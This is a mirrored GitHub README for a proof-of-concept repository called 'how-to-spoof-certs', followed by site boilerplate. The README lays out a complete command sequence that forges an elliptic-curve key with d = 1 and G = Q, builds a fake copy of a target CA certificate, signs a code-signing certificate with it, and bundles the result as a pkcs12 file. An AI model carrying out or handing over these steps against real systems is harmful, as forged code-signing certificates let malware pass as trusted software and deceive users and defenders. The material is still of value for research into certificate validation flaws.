Giter VIP home page Giter VIP logo

how-to-spoof-certs's Introduction

You can create a CA with the following command:

$ openssl ecparam -name secp384r1 -genkey > ca.key
$ openssl req -new -x509 -key ca.key -out ca.crt

The PoC assumes you have the certificate of the CA you wish to spoof. In the following example, the certificate uses NIST P-384 (secp384r1) curve, but this works for different curves as well.

# forge a spoofing key, where d = 1, G = Q
$ ruby main.rb > fake.key 

# generate a spoofing certificate with the spoofing key
$ openssl req -new -x509 -key fake.key -out fake.crt 

# generate a key for your own certificate:
$ openssl ecparam -name secp384r1 -genkey > cert.key 

# request a certificate signing request for code signing:
$ openssl req -new -key cert.key -out cert.csr -config openssl.conf 

# sign the certificate request with our fake certificate and fake key
$ openssl x509 -req -days 365 -in cert.csr -CA fake.crt -CAkey fake.key -out cert.crt -CAcreateserial

# pack the certificate with its key and the fake certificate into a pkcs12 file
$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile fake.crt -out cert.p12

how-to-spoof-certs's People

Contributors

ztora avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.